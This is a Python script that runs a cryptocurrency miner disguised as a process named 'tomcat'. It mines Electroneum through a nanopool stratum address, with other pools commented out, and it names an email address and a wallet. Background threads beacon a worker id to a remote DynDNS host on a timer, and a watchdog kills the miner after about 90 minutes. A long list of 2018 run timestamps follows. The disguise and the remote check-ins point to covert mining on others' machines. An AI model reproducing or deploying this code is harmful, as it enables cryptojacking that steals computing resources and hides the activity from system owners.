import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:33:06.161190
#2018-02-17 17:21:04.724667
#2018-02-17 19:09:04.606720
#2018-02-17 20:57:03.722715
#2018-02-17 22:43:05.006890
#2018-02-18 00:26:06.548111
#2018-02-18 02:17:06.115679
#2018-02-18 04:04:06.683160
#2018-02-18 05:55:07.229969
#2018-02-18 07:47:06.583037
#2018-02-18 09:35:03.978753
#2018-02-18 11:20:08.163782
#2018-02-18 13:06:07.677159
#2018-02-18 14:55:07.192153
#2018-02-18 16:43:01.424580
#2018-02-18 18:32:06.627283
#2018-02-18 20:20:07.956939
#2018-02-18 22:06:06.455545
#2018-02-18 23:54:04.351133
#2018-02-19 01:40:08.631958
#2018-02-19 03:28:07.529752
#2018-02-19 05:13:05.075400
#2018-02-19 06:59:04.562903
#2018-02-19 08:48:06.060896
#2018-02-19 10:38:07.493437
#2018-02-19 12:25:10.549681
#2018-02-19 14:12:06.638126
#2018-02-19 16:02:04.763743
#2018-02-19 17:50:08.878620
#2018-02-19 19:37:04.433486
#2018-02-19 21:25:04.223211
#2018-02-19 23:10:01.372189
#2018-02-20 00:55:07.908606
#2018-02-20 02:44:05.191012
#2018-02-20 04:34:04.410068
#2018-02-20 06:18:05.633639
#2018-02-20 08:03:07.264679
#2018-02-20 09:48:08.968625
#2018-02-20 11:33:05.128495
#2018-02-20 13:19:07.978363
#2018-02-20 15:05:09.880549
#2018-02-20 16:49:04.192379
#2018-02-20 18:32:01.923423
#2018-02-20 20:23:05.783600
#2018-02-20 22:10:06.263255
#2018-02-20 23:52:01.344856
#2018-02-21 01:38:07.464766
#2018-02-21 03:25:04.158967
#2018-02-21 05:12:06.320473
#2018-02-21 06:59:06.642028
#2018-02-21 08:46:03.989551
#2018-02-21 10:34:01.506903
#2018-02-21 12:22:07.783885
#2018-02-21 14:10:09.767409
#2018-02-21 15:56:01.327729
#2018-02-21 17:48:09.772995
#2018-02-21 19:33:08.503273
#2018-02-21 21:21:07.447454
#2018-02-21 23:09:06.566915
#2018-02-22 00:58:05.567946
#2018-02-22 02:47:01.408435
#2018-02-22 04:33:04.018984
#2018-02-22 06:18:07.861874
#2018-02-22 08:04:06.464802
#2018-02-22 09:52:05.357660
#2018-02-22 11:38:07.788182
#2018-02-22 13:24:10.397963
#2018-02-22 15:12:08.828394
#2018-02-22 16:56:10.534193
#2018-02-22 18:45:07.198375
#2018-02-22 20:37:06.651082
#2018-02-22 22:22:05.360050
#2018-02-23 00:08:08.385830
#2018-02-23 01:56:06.860462
#2018-02-23 03:44:05.808312
#2018-02-23 05:33:01.245491
#2018-02-23 07:17:05.376064
#2018-02-23 09:20:02.874892
#2018-02-23 11:26:03.601649
#2018-02-23 13:17:01.375516
#2018-02-23 15:04:01.270825
#2018-02-23 16:53:01.968624
#2018-02-23 18:40:07.726802
#2018-02-23 20:26:07.060600
#2018-02-23 22:13:08.020656
#2018-02-24 00:01:04.224279
#2018-02-24 01:52:06.606865
#2018-02-24 03:46:07.674965
#2018-02-24 05:33:07.336167
#2018-02-24 07:19:06.432758
#2018-02-24 09:09:06.922968
#2018-02-24 10:41:04.594403
#2018-02-24 12:32:01.695744
#2018-02-24 14:20:09.597773
#2018-02-24 16:07:05.190239
#2018-02-24 17:58:05.058721
#2018-02-24 19:46:02.062485
#2018-02-24 22:54:01.458590
#2018-02-25 03:03:07.752990
#2018-02-25 06:51:06.245343